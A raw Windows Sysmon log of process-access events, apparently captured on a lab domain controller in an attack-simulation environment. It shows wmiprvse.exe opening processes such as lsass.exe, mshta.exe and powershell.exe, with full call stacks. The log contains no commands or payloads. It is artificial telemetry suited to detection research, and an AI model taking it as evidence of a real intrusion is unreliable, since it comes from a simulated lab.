15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024038Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024037Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024036Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024035Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024034Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024033Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024032Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024031Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024030Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024029Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024028Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024027Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024026Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024025Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4606-00000000A301}3316C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024024Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024023Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024022Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024021Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-4106-00000000A301}7412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024020Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024019Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 